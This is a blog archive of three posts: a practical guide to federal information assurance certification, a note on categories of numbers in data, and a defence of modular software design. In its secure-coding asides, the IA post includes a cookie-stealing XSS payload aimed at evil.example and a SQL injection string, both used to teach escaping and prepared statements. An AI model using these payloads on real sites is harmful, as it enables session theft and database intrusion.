Wednesday, February 27, 2013

Federal IA certification of systems

by Eric Whyne
Also scheduled to be posted on Data Tactics Blog.

From the perspective of a software developer, federal software information assurance evaluation always seems to be an unnecessarily complicated topic. At first glance there seems to be a rigidity and lack of pragmatism or common sense to the process. I don't think that's really the case, but I refuse to add anything to the dialog that might confuse folks even more than they already are. In this post I identify the important parts and break things down into the elements that are common across the various frameworks and describe my approach to each. For the last few years there has been talk of mandating that more systems undergo IA evaluation, specifically those identified as "Critical Infrastructure". Maybe in the future it won't just be systems for the federal government having to undergo IA risk management.

I don't take the topic lightly; my career started in Information Assurance and for the past 8 years I've been involved with organizing a fairly large project that creates the Computer Security Handbook (currently in its 5th edition). Like that book, this post approaches security certification/assessment from the perspective of a manager (aka project level decision maker) trying to get a project through the process. I wanted to plainly describe the important steps and put forth a pragmatic approach for how to achieve success and avoid common mistakes I've seen made.

When getting systems certified to deploy on Government networks we are essentially just doing risk management and mitigation. A common jest I hear from some engineers is that certification is just a bunch of paperwork. To be honest, that's mostly true. Risk management usually means paperwork. When I was a Marine Corps officer and we were doing Operational Risk Management (ORM) for live fire training exercises it was... paperwork. But it was useful paperwork that saved lives by making us think through the details of what could go wrong and how to prevent it. When approached correctly, security assessments can and do help us deploy safer systems. It's important to keep a positive attitude through the process and stay focused on those goals.

The risk management frameworks we work with in the federal space fall within the Department of Defense Directive 8500.x series or the NIST Risk Management Framework (RMF). NIST RMF is how DCID 6/3 and ICD 503 are implemented; in the DoD it is guided by CNSS 1253, which complements SP 800-53 and specifically addresses national security systems. Although ICD 503 rescinded the mandate to use DCID 6/3, DCID 6/3 continued to be used because no replacement guidance was ever published. ICD 503 is very broad and designed to be static; it outlines basic goals but not how to achieve them. If this sounds confusing, it's because it is.
 
My advice is that if your organization is trying to figure out how to do this from scratch, focus on the NIST RMF approach (CNSS 1253, SP 800-53, whatever revision they are on). Most organizations claim to be transitioning to that. I'll use some DoDD 8500 examples in this post because the fundamentals really stay the same, which is what you need to be focused on. There are minor differences in vocabulary. For example, DoD 8500 discusses Certification and Accreditation while NIST RMF uses the terms Assessment and Authorization. Don't get lost in the details of the semantics. Understand that much of what is written can be subject to very broad interpretation, where the final decisions rest at the lowest levels (which is where I think they should be). The fundamentals are where you gain traction and are how you make security happen. Your job as the project manager and engineer is to make security happen and document how it was done to demonstrate the level of security to others.

Some advice: read each of the documents if you can find the time. People will always think you are brilliant even if you just spend an hour scanning each important manual. Smart people usually aren't really smarter than anybody else; they just work harder and focus more. You'll gain an authority that will help you control scope later on. It will also give you an awareness of the mindsets driving these processes. I haven't counted, but with some of the documents weighing in at over 200 pages, the federal software security certification/assessment guidance probably rivals the complexity of US tax law. Because of this complexity and unavoidable contradictions, in any given meeting you'll find that people's understanding of the processes varies widely. When uncertainty creeps into conversations, folks tend to defer decisions to outside authorities. I heard a great term for this in a meeting a few weeks ago: "the gonculator". Unfortunately, there is no magical outside authority that will make the detailed security decisions for you. Take ownership. Understand that cowardice is just as fatal to your project as imprudent courage. With that said, caution and humility are always advised, regardless of how well you think you understand things. I've seen engineering managers become frustrated because they have been unable to plan for the various activities required by accreditation. This can cause tension between the IA team and the engineers. Those situations are created by conflicting goals and vocabularies. Each domain is often unable to speak to the other's goals in its own conceptual framework, and folks get rightfully frustrated. Here are the basics to help you be better prepared for those dialogues, with enough understanding and courage to ensure the right actions are taken and the best decisions are reached.

In my opinion, as an engineer or an engineering project manager you only really need a detailed understanding of the contents of two of the guiding documents, depending on whether you have to do 8500 or NIST RMF. These documents lay out the generic security controls that your system will need to meet. There will be various decisions along the way that determine exactly which generic controls need to be met, but if you don't want to be caught with a nasty surprise you should have a good idea of what the controls are and a good feel for the intent of each of them.

For NIST RMF, the generic controls are documented in SP 800-53 "Recommended Security Controls for Federal Information Systems and Organizations".

For 8500, the generic controls are documented in DoDI 8500.2 "Information Assurance (IA) Implementation".

Don't memorize them because, unfortunately, you won't be contending directly with these controls when deploying systems. What you'll be contending with is your Information Assurance staff's interpretation of them, and those interpretations will vary. For an engineering staff going through the processes of any of these frameworks, the fundamental approaches are going to be the same. There is an evaluation and mitigation of risk which results in a decision to let the system deploy (or not). You will need to undertake five unique, separate, and fundamental engineering activities. These are my "activities" derived from my experience. Think of them as a conceptual framework to put the actual activities of whatever process you're dealing with in context. Different processes implement these fundamental approaches in different ways.

1. Implement generic "good idea" guidance. This is where all the process paperwork happens, but some of the guidance is very technical. In 8500 these generic good ideas are called "IA Controls". In NIST RMF they are called simply "Security Controls". They are documented in the two documents that I think you should become familiar with above (SP 800-53 and DoDI 8500.2). This is how you integrate security during the planning stages of development. Having a deliberate planning activity that goes through each technical security control in order of severity and applies it to your design during development will make your system fantastically more secure. At that point, writing down ideas about how to verify those controls in the end system pretty much knocks out your test plan. Understand that not doing this stuff early means you'll be incurring technical debt that will have to be paid before you can deploy your system, and it only gets more difficult as time goes on.

2. Find out which documented vulnerabilities affect your system, prioritize and fix them. The universal system for referencing vulnerabilities is Common Vulnerabilities and Exposures (CVE) identifiers.

3. Find out which specific secure configuration guidance applies to the specific software in your system and then implement it. In 8500 these are called Security Technical Implementation Guides (STIGs). NIST RMF has taken the software-specific implementation guidelines and created an XML dissemination format which automates them; it's called the Security Content Automation Protocol (SCAP).

4. Conduct automated vulnerability scanning and evaluate the results. Document the occurrence of false positives (say why they are false) and prioritize and fix any vulnerabilities found.

5. Whatever you can't fix right now needs a plan that describes how it will be mitigated or fixed in the future. In 8500 this is called a Plan of Action and Milestones (POA&M).

In most risk management frameworks (thinking of the Project Management Institute (PMI) approach here), the first step is to identify risks and write them down in a spreadsheet called a risk register. Then you assign two subjective numbers: one for how probable you think the risk is, and one for how bad the effects would be if it happened. Then you prioritize, conduct risk mitigation (i.e. take action to lower either the probability or the effects) on the worst of them, and periodically start that process over (aka monitor risks). This is very productive and it's plain to see how it can help. It certainly helped me avoid having Marines injured or killed in training accidents, so I'm a believer.
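As a concrete illustration of that register-and-prioritize loop, here is a minimal sketch in Python. The risks and the 1-to-5 scores are made up for the example; they don't come from any framework.

    # Minimal risk register sketch: subjective probability and impact scores (1-5),
    # prioritized by their product. Risks and scores are invented for illustration.
    risks = [
        {"risk": "Unpatched web framework", "probability": 4, "impact": 5},
        {"risk": "Single admin knows the deploy process", "probability": 3, "impact": 3},
        {"risk": "Backups never test-restored", "probability": 2, "impact": 5},
    ]

    for r in risks:
        r["score"] = r["probability"] * r["impact"]

    # Mitigate the worst items first, then revisit the list periodically (monitoring).
    for r in sorted(risks, key=lambda r: r["score"], reverse=True):
        print(f"{r['score']:>2}  {r['risk']}")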

Unfortunately, computers and software systems are very complex. The risks are complex and, to be completely honest, nobody has a real clue about how probable the risks are. To combat this complexity, the 8500.x accreditation and NIST RMF start off by requiring a determination of how much availability, integrity, and risk acceptance the system needs or can have. This assessment is mostly used to decide which generic guidance needs to apply to your system.

Once your system has this classifier associated with it, the process begins for real. (Important note: only systems in the context of their deployed environment are accredited, not individual software packages.) So let's say you're doing DoD 8500 and your system is determined to be MAC II Classified, which is a common determination. That designation determines which Information Assurance (IA) Controls you are required to implement on the system. The IA Controls are generic guidance about how to configure the system. You'll find the details about IA Controls in the enclosures of DoDI 8500.2: Enclosure 2 talks about Mission Assurance Categories and Confidentiality Levels, then Enclosure 4 describes the IA Controls for each resultant category of system. As soon as possible you need to have the IA staff provide you a list of the IA Controls you'll have to implement on your system. Have them provide it to you and get them to agree that it is the correct list. Hold a meeting, preferably in person, to review each one. In an 8500 accreditation there are usually around 70 specific controls you need to meet. You show that you have met them by taking the required action and writing down what was done or how the system meets the requirement.

Here are IA Control examples and a short discussion of potential pitfalls:

IA Control DCAR-1

"An annual IA review is conducted that comprehensively evaluates existing policies and processes to ensure procedural consistency and to ensure that they fully support the goal of uninterrupted operations."

The four letters DCAR have a special meaning, but we don't need to memorize it; we can just treat it as a categorical identifier (see my post on numbers in data). What this IA Control is saying is that you need to have an annual review. Sounds easy. Where this can go south is when the IA staff wants to kick off right into the first annual review and make generation of each of the procedural documents a requirement for meeting completion of this control. Controlling scope is an important part of getting through the process successfully. If possible, you should push those into the "plan for the future" phase so you can have time to do them correctly. If you end up not being able to control scope here, the worst case scenario is that you burn a few weeks of your schedule on process documentation. But if you have to do that, do it smartly. Use the time to pay off the technical debt your project has probably been accruing. Cover your bases on the other process-focused IA controls. Divide and conquer: make sure your engineering team is working the controls specific to technical implementation while you wrestle with the process ones.

As for other Process focused IA Controls, they might require you to write things like a System Security Plan (SSP) or other security documentation artifacts. Just go with what your IA staff needs or wants because this varies widely from organization to organization. Some organizations are easy and pragmatic about this, some are unnecessarily hard (in my opinion). It has to do with the overall technical competence of the organization and how risk tolerant they are. While you're doing this, plan ahead. When you add new software to the system in the future it will be facilitated by the processes you lay out here. There are tricks to writing good processes that make that easy, but that's left for another blog post.

DCMC-1 Mobile Code
I'm not going to paste in the text for this one here, but it basically says that "mobile code" needs to be signed by a certificate. Yes, JavaScript is mobile code. Before you start panicking about having to cryptographically sign every piece of dynamically generated web app JavaScript in your system, take a deep breath and relax. JavaScript executed in a browser is exempt from this requirement. Here's the guidance from NIST that you can cite: "Within a browser context, JavaScript does not have methods for directly accessing a client file system or for directly opening connections to other computers besides the host that provided the content source. Moreover, the browser normally confines a script's execution to the page in which it was downloaded." There are DoD documents that say the same thing; your IA staff should know this (but some don't). Still, watch out for things like cross-site scripting vulnerabilities when deploying JavaScript/HTML5 interfaces. If you don't know what those are, you need to study them. Basically, if at any time a user can generate JavaScript that will be shown on another user's screen, you're vulnerable.
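To make that last point concrete, here is a minimal sketch (Python, standard library only) of the difference between echoing user input raw and escaping it before it lands on another user's page. The payload string is a hypothetical example, not anything taken from the guidance above.

    import html

    # A hypothetical comment submitted by one user and later rendered on another user's screen.
    user_comment = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'

    # Vulnerable: the input is dropped into the page verbatim, so the browser executes the script.
    unsafe_fragment = "<p>" + user_comment + "</p>"

    # Safer: escape the input so the browser renders it as text instead of executing it.
    safe_fragment = "<p>" + html.escape(user_comment) + "</p>"

    print(unsafe_fragment)
    print(safe_fragment)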

DCPA-1 Partitioning the Application
"User interface services (e.g., web services) are physically or logically separated from data storage and management services (e.g., database management systems). Separation may be accomplished through the use of different computers, different CPUs, different instances of the operating system, different network addresses, combinations of these methods, or other methods as appropriate."

DCPA-1 is probably my favorite IA Control. I like straightforward and useful technical guidance. Watch out though, because controls like this can cause some major refactoring of your system if it wasn't built properly. If you tried reducing the number of operating system licenses for your system by cramming stuff together, you might be running into problems here. Next thing you know you're not only changing your budget (buying extra licenses) but your schedule slips as you rebuild the systems to implement the required partitioning of the application. On a related database note: please use prepared SQL statements if you're using a database in your application. If you let users control an unfiltered text variable that gets placed into an SQL statement you might as well be giving them the keys to the database. This is database security 101, but it still happens. Finding mistakes like this is one of the real values of code reviews.
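A minimal sketch of the difference, using Python's built-in sqlite3 module; the table, data, and malicious input are made up for the example.

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

    user_supplied = "alice' OR '1'='1"  # hypothetical malicious input

    # Dangerous: user-controlled text becomes part of the SQL statement itself.
    #   query = "SELECT role FROM users WHERE name = '" + user_supplied + "'"

    # Prepared/parameterized statement: the driver treats the input strictly as data.
    rows = conn.execute("SELECT role FROM users WHERE name = ?", (user_supplied,)).fetchall()
    print(rows)  # [] -- nobody is literally named "alice' OR '1'='1"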

Once you get a good handle on the IA Controls/Security Controls you've been handed, breathe easy. The rest of the process is focused on the specific technologies of your system and is more straightforward. At some point you'll be asked to provide a list of the software on the system and each of the version numbers. What the IA staff wants to do is check two databases for the software. One is the National Vulnerability Database (NVD), the other is the DISA Security Technical Implementation Guides (STIGs) site or the Security Content Automation Protocol (SCAP) site. Here is the site for the National Checklist Program.

When they look your software up in the NVD you should get back a list of Common Vulnerabilities and Exposures (CVE) identifiers. Just as with the IA Controls, make sure they provide you with this list and that everyone agrees on it. CVEs are just publicly known vulnerabilities in the software. The reason the IA staff will get this list is because they will prioritize each vulnerability by assigning it a Category. These range from Cat I, which is "results in total loss or provides immediate access", to Cat IV, which is something like "results in degraded security". You need to come to an agreement about which vulnerabilities need to be addressed before the system goes live. The determination should take into account attack surface and severity. Make sure you know what needs to be addressed. Once everyone is in agreement, have the engineering team start closing the holes and writing down what they do. Since these are all technical undertakings, my approach has been to paste all the CVEs that need to be answered into a wiki. Again, divide and conquer. Set folks to work in accordance with their capabilities and have everyone paste their results and remediation notes into the wiki next to their CVEs. Upon completion, export to a document and you're done. Keep the wiki up and keep building on it as new vulnerabilities come out.

A note on patching vulnerabilities: it's a necessary practice to check whether the vulnerability has already been fixed on your system before attempting to patch it! It usually has been. This is especially true on Linux systems. CVEs identify software by version number, but on modern software systems lots of folks have good reason to use older versions of software. For example, older versions tend to be more stable. This means that security patches are almost always back-ported to older versions of software. In order to determine if the software you are using has been patched, look at the release notes. You'll typically find the CVE numbers mentioned in there. On RedHat and CentOS you can do this by using the command "rpm -q --changelog <package name>". I never feel bad paying for Linux support licenses because it allows companies like Canonical and Red Hat to stay on top of this stuff. They are the ones doing all the hard work back-porting security patches. Here is Ubuntu's page on the matter.
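If you have a long list of CVEs to check, that same lookup is easy to script. Here's a rough sketch that assumes a RedHat/CentOS host and uses only the rpm command mentioned above; the package name and CVE ids are examples, so substitute your own list.

    import subprocess

    package = "openssl"                         # example package under review
    cves = ["CVE-2012-2333", "CVE-2012-0884"]   # example CVE ids from your list

    # Pull the package changelog once; back-ported fixes are usually noted there by CVE id.
    changelog = subprocess.run(
        ["rpm", "-q", "--changelog", package],
        capture_output=True, text=True, check=True
    ).stdout

    for cve in cves:
        status = "already patched" if cve in changelog else "needs investigation"
        print(f"{package}: {cve} -> {status}")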

STIGs are addressed much like CVEs. Have them provide you the list and assign categories to each, then work together to determine prioritization. As the name implies, Security Technical Implementation Guides deal with how the software is configured. When your engineering team starts working on the STIGs, have them document what was done to implement each requirement or reduce the attack surface. If you're doing NIST RMF, you'll get the SCAP XML file and tools, which should automate things a bit. Stuff will break. That's to be expected; just make sure you interact with the engineers enough to understand what's going on and how the schedule will change. Stuff like this has the potential to create project drag and shift schedules, so keep a handle on it and keep stakeholders updated.
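As a rough illustration of what "automate things a bit" can look like, here is a sketch that tallies the results out of an XCCDF results file produced by an SCAP scanner. The file name and the namespace/element layout are assumptions about your tooling's output (XCCDF 1.2 here), so treat it as a starting point rather than a known-good parser.

    import xml.etree.ElementTree as ET
    from collections import Counter

    # Assumed: an XCCDF 1.2 results file written by whatever SCAP scanning tool you use.
    RESULTS_FILE = "scan-results.xml"
    XCCDF = "{http://checklists.nist.gov/xccdf/1.2}"

    tree = ET.parse(RESULTS_FILE)
    tally = Counter()

    # Each rule-result element records the outcome (pass, fail, notapplicable, ...) for one rule.
    for rule_result in tree.iter(XCCDF + "rule-result"):
        outcome = rule_result.findtext(XCCDF + "result", default="unknown")
        tally[outcome] += 1

    for outcome, count in tally.most_common():
        print(f"{outcome}: {count}")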

Aside from some general IA Controls/Security Controls, up to this point we've mostly just addressed how to secure software that is popular enough to have made it into the STIG guidance, SCAP, or the NVD. Astute technologists will note that there's a good chunk of custom developed code or obscure software that needs to be addressed more closely. You're right. The last technical hurdle is system scans. Typically this will be done by deploying the software to a test environment or conducting non-destructive scanning on the soon-to-be-production system. It always seems like you get an extremely long list of false positive results from any scanning software. I'm not a fan of having to deal with those. If you've ever attended an IA meeting, this is where the huge numbers of "vulnerabilities" might be thrown about. (See my blog post about Automated Vulnerability Scanning to read my advice if you're stuck managing the conduct of scans.) Don't let the IA team throw that list "over the wall" at you and ask you to put a schedule on its completion. If they don't acknowledge that at least some of the results are false positives from the start, you're going to have a hard time getting anywhere. Demand a meeting to review the scan results with the IA folks that did the scan and invite key members of the engineering staff. Categorize the results and get some idea of how to prioritize addressing them. Often, whole chunks of results can be easily identified as false positives in this meeting and can be dismissed immediately. Add a column to the spreadsheet listing the findings and just flag each of them as false positives. Then evaluate the rest that you're unsure of to the satisfaction of the IA staff. Don't waste time. Keep going for the kill and keep closing out items. Above all, don't throw the list of thousands of items "over the wall" to your engineering staff and ask them to come up with a schedule. Take ownership initially, and once the list of uncertainties is manageable then start delegating detailed exploration and fixes. Document via the wiki strategy we described previously.
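One way to handle that spreadsheet without retyping anything: export the scan findings to CSV, add the disposition columns programmatically, and let the review meeting fill them in. A minimal sketch; the file and column names are invented, since every scanner exports something different.

    import csv

    # Assumed input: a CSV export of scan findings. Column names vary by scanner.
    with open("scan_findings.csv", newline="") as src, \
         open("scan_findings_triage.csv", "w", newline="") as dst:
        reader = csv.DictReader(src)
        fieldnames = list(reader.fieldnames) + ["disposition", "notes"]
        writer = csv.DictWriter(dst, fieldnames=fieldnames)
        writer.writeheader()
        for row in reader:
            # Default every finding to "needs review"; the meeting flips rows to
            # "false positive" or "fix required" and records the reasoning in notes.
            row["disposition"] = "needs review"
            row["notes"] = ""
            writer.writerow(row)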

As we've gone through the various hurdles, there is probably a list of items that can't be completed prior to the release of the software. They might be in a lower risk category or just too difficult to fix in a reasonable amount of time. That doesn't mean you need to push back your release schedule. What happens with those items is a planning exercise. I saved mentioning this for last because it should be done late in the process, after other options have been explored and the engineering staff has a good grasp of the implications of addressing the open items. Create a Plan of Action and Milestones (POA&M) document which lists each of the open issues, summarizes the risks, and identifies the actions that will be taken to close them.

If you've gotten this far, the last step is to compile all of these artifacts (which should effectively be a list of the actions everybody took to secure the system!) and put them together in a single package for review. Done effectively, this compilation of results provides a realistic estimate of the security of the system and can be used to grant it an authority to operate on the "enclave" we are trying to introduce it to. Done poorly, the package is a soupy mash of obscure and useless information that doesn't drive a decision. If at all possible, dive into helping with the creation of this package. At the very least, demand to see it prior to it being shown to the decision maker. Often the person making the decision is so senior that they haven't been involved in the assessment and security process up until this point. Make sure that your system makes a good first impression. If the package reflects poorly on the system, immediately address the issues and push back the decision. Don't let it go forward and just hope for a good result. Authorizations to operate are ephemeral and come in various flavors which designate just how temporary they are. An Interim Authority To Test (IATT) can be valid for just a few weeks or months. A full-blown Authority To Operate (ATO) can be valid for much longer before the system must be reassessed.

My hope is that this post has provided some clarity on the process. Guidance periodically changes, but the five fundamental activities I've laid out here are common sense and common across the various frameworks of the past. Security means way more than just checking vulnerabilities and patching them. It requires addressing the system as a whole and being diligent about all five aspects of this process. Keep a working awareness of the generic "good idea" documents I've described above and make the knowledge in them part of your engineering culture. You'll write more secure software and alleviate some of the engineering anxiety when approaching certification time.

Sunday, February 10, 2013

Categories of numbers from data


I think some programmers approach numbers in the wrong way when solving data problems. 

Wikipedia hosts a comprehensive list of types of numbers. They are all important, although when implementing code we rarely get to think in those terms. The list of ways numbers relate to computers is shorter. This is where most programmers spend the majority of their time thinking and working. Here are the big three:
  • Integers
  • Floats
  • Bignum or Arbitrary precision
The distinction between them is in how these numbers are treated in the memory of the computer. Different languages have different implementations. Know that integers and floats have fixed sizes and that using a bignum is less efficient. If you put too big a number into fixed-size memory it will be truncated or overflow and cause problems. Dealing with bignum or arbitrary precision numbers will slow down how fast your program runs.
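A quick illustration of the difference: Python's plain int is arbitrary precision, while NumPy's fixed-width types behave like machine integers (this sketch assumes you have NumPy installed).

    import numpy as np

    big = 2147483647  # the largest value a signed 32-bit integer can hold

    # Python's built-in int is arbitrary precision: it just keeps growing (and gets slower).
    print(big + 1)                      # 2147483648

    # A fixed-size 32-bit integer can't represent the result; it wraps around instead.
    print(np.int32(big) + np.int32(1))  # -2147483648 (overflow)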

I have an affinity for untyped and weakly typed programming languages because they allow me to spend more time in a different frame of mind. If you're not familiar with the terms: it doesn't mean that they are spoken word or that you hit the keys more lightly; it has to do with how variables are declared. In an untyped language you mostly just put data in the variables you create and the compiler figures out most of the details about whether to treat the data as a string, an integer, a float, or whatever. It makes writing code more enjoyable, since only in a small set of circumstances do I ever really care about how that stuff is handled anyway. Most untyped languages have ways of telling the computer specifically what to do when it matters.

This post is about that different frame of mind. I wanted to discuss a way of thinking about numbers that I rarely see addressed in literature or discussion that I think is important. It deals with how we need to think about these numbers when they appear in data. In my mind, numbers from data fall into these three categories.
  • ordinal
  • numeric (including cardinal)
  • nominal (aka categorical)
Statisticians care deeply about these categories. Some of my friends guffaw at how common-sense dealing with numbers in this manner is, and they are right. You'll find them prominently listed in statistics literature, but not so much in computer science or programming books. I think they are important to computer science, but their significance is largely ignored. As we approach data problems with computers, this categorization becomes more important.

A brief description of each:

Ordinal numbers, although they might not appear or be sorted into an order in the data, can be put into a sorted order. What's missing from ordinal numbers is the relative size or degree of the difference. They are most commonly represented by integers, but don't let that fool you. They can be represented by other things as well, in some cases even letters. An example of an ordinal number would be the ranking of winners in a race. By looking at first and second place we know who is faster, but just going off of those numbers we can't tell how much faster.

Numeric numbers are similar to ordinal numbers, but give clues about relative differences. If we arranged a set of objects by weight their position would be ordinal and the weight would be numeric.

Categorical numbers simply serve as a unique identifier or an identifier of some category. A common example of these types of numbers is a part number or serial number on a piece of equipment. You can really get away with treating these as text in most circumstances. In real world data, people have a habit of sneaking in other characters when you don't expect them anyway (like dashes). Real world categorical numbers also tend to be multi-layered. A great example of this is phone numbers. The first three digits give information about a geographic region. If it's a cellular number from the United States, it was probably the geographic region the subscriber was in back in 2005. I like that when phone numbers appear whole in a normalized relational database they create a micro-instance of a denormalized data structure (don't tell your 1970s-to-late-1990s relational database professor; this was a sin back then). It doesn't really matter because of the context they usually appear in, but I always enjoyed that little nuance. In a future post I might discuss denormalized vs normalized structures and when each is useful. It's probably one of the biggest decisions we make when designing an approach to a data problem.
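A small illustration of why treating categorical "numbers" as text is usually the right call; the part number and phone number below are made up.

    # Categorical identifiers are best kept as text, not parsed as integers.
    part_number = "00451-A7"    # the leading zeros and the dash carry meaning
    phone = "703-555-0142"      # fictional number; the first three digits are a category of their own

    area_code = phone.split("-")[0]   # fine as a string operation
    # int(part_number)                # raises ValueError; int("00451") would silently drop the zeros

    print(area_code)  # "703" -- useful as a category, meaningless as a quantity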

I think approaching data problems by looking at numbers with these attributes in mind first is more productive than thinking about whether or not things will fit in memory. Too often I've seen consternation and wasted time as people try to force categorical numbers into a mechanism designed for integers. There's no need. Thinking about numbers in terms of their ordinal, numeric, and categorical properties makes those warehousing and analysis questions easier.

Friday, February 1, 2013

Modular vs Integrated wrt Boeing 787 project



A colleague forwarded this article. I think the conclusion it reaches is wrong.
http://blogs.hbr.org/cs/2013/01/the_787s_problems_run_deeper_t.html

First, I have no opinion on the 787 project and no problem with Boeing's approach. The article attempts to blame the supposed cost and schedule problems of the Boeing 787 project on premature modularization. Maybe that's a problem when building airplanes or power plants (I have never designed either, so I'll suspend my disbelief). However, I strongly disagree with regard to software. Granted, software is different from most engineering undertakings. But I think we can reason through some useful engineering considerations from within that context.

There are two primary reasons to integrate early in software projects: decreased development time or increased optimization (aka decreased run time).  Sure, faster development and faster software are both good things.  But there are trade-offs to attaining each.

Decreased time: The software term for early and overly-tight integration to reduce development time is a "hack" or "prototype". This can be fine in some cases, but it usually means that the solution is myopic and there is an increased cost to applying it to other use cases or problems. When writing software, which is mostly tools for others to use in the course of their professions, we want it to be as widely applicable as possible (while still being effective for the original intended purpose). Modifying the software or deploying it in situations outside the scope of the original prototype becomes more difficult because, during prototype hacking, middle components are left out and back-end components are often built in a manner that doesn't scale well. Modularization reduces the cost of changing these components to meet new use cases.

Increased optimization: Alternately, integration pursued as an optimization can also be problematic because it increases the cost of change. Tightly integrated code is more difficult to troubleshoot and debug. Don Knuth famously noted this when he said "Premature optimization is the root of all evil (or at least most of it) in programming". Changing requirements are also a common occurrence in software projects. Optimizing prematurely means that you may be required to untangle a web of dependencies before making changes. You literally "outsmart yourself" when that clever trick to reduce runtime has to be laboriously undone because the tables have turned on where execution time matters. Modularity assists in addressing shifting requirements by reducing the cost of change.

As an example, separation of concerns is a core tenet of how we bounce data around the Internet. The protocol that handles routing of information (IPv4) isn't the same protocol that handles error correction (TCP). Some use cases don't need perfect transmission of every bit of data, e.g. Voice over IP (VoIP), so when those came along TCP was replaced with UDP for that use case. If you miss a few bytes of audio while someone is speaking, it doesn't matter if those bytes catch up a few seconds later. Our human brains happen to be very good at filling in small gaps in audio, especially human speech. To look at the reverse of that independence, because of the growth of the Internet it looks like we'll run out of IPv4 address space soon. Updating to IPv6 doesn't break the protocols layered on top of it (TCP, UDP, VoIP). This is all possible because the stack is designed with modularity in mind.
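From an application's point of view, that layering shows up as a tiny, swappable detail. A minimal sketch in Python (the address and payload are placeholders): choosing reliable TCP or fire-and-forget UDP is one constructor argument, because the transport layer is separate from everything above it.

    import socket

    ADDRESS = ("127.0.0.1", 9999)      # placeholder host and port
    payload = b"a few bytes of audio"

    # Reliable, ordered delivery (TCP)...
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # ...or fire-and-forget delivery (UDP): same API, different transport underneath.
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(payload, ADDRESS)  # no connection setup, no retransmission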

Let's think of another popular and current example: SOLR, Lucene, and Tika. This is a great stack of software that, when put together, provides one of the best enterprise search capabilities available (and it's open source). SOLR indexes and searches text (using Lucene underneath). Tika transforms various documents into text. Had these complementary functionalities been tightly integrated into the same software it might have decreased development time or run time, but the added complexity and dependencies would also mean that the use cases would be far more limited than they currently are. Plenty of projects use SOLR and Tika to do unique and interesting things as part of other systems. The modular approach to development of these projects enabled that.
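To make the division of labor concrete, here is a rough sketch of wiring the two together over their HTTP interfaces. It assumes a local Tika server and a Solr core named "docs" on their default ports, plus the requests library; endpoint details vary by version, so treat it as an outline rather than a recipe.

    import requests

    # Tika's job: turn an arbitrary document format into plain text.
    with open("report.pdf", "rb") as f:
        text = requests.put(
            "http://localhost:9998/tika",          # assumed: default Tika server port
            data=f,
            headers={"Accept": "text/plain"},
        ).text

    # SOLR's job: index and search text. It never needs to know the text came from a PDF.
    requests.post(
        "http://localhost:8983/solr/docs/update?commit=true",   # assumed: a core named "docs"
        json=[{"id": "report-1", "content": text}],
    )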

Modularity allows components of a system to evolve independently. Tika can continue to parse new file types and SOLR can continue to do neat stuff with indexes, and thanks to their modular approaches they can each evolve on their own schedule. If I have a specific set of file types the Tika developers will never see and that I can't share with them, I can write my own parser and output to something SOLR can read. Since software advances so quickly, this matters more here than in other professions. Integration increases the cost of change to any single functionality or concern. Unintended side-effects of advancements cascade through the software. Understanding interfaces is a necessity, and the work required to think through modularization is useful in catching unanticipated problems early and creating maintainable, usable software.

In the case of airplanes, "flying x people y miles" seems to me to imply a very static use case, so tight integration might be good. Certainly in the case of Apple's product lines tight integration has served them well, due to their ability to maintain a homogeneous software and hardware environment. But I'd argue even that to some degree. Even though Apple products appear to be tightly integrated, the hardware manufacturers have famously made last-minute changes that were facilitated by modularity of the hardware components. Anyone who has ever disassembled an iPhone has probably been as amazed as I was to see how modular the components are. So the author's argument using his experience at Apple as a precedent falls apart under scrutiny.

I doubt modularity caused the failure of the 787 effort. Perhaps they were implementing modularity at the wrong level or in the wrong way. Perhaps the actual causes of the failure weren't related to integration vs modularity at all. "Asked suppliers to create their own blueprints for parts" seems like a pretty big red flag in my mind, fraught with all sorts of chances to mess up simple things like English-to-metric conversions, or to have variances in design software nuances cause problems. "Lawyers will probably get involved" is another red flag. Writing business sub-contracts which don't account for known unknowns seems like very poor decision making. The author seems to be stretching in the assertions he is able to make about building things if he is blaming this failure on modularity. (That's my polite way of saying that I think he missed the mark entirely.)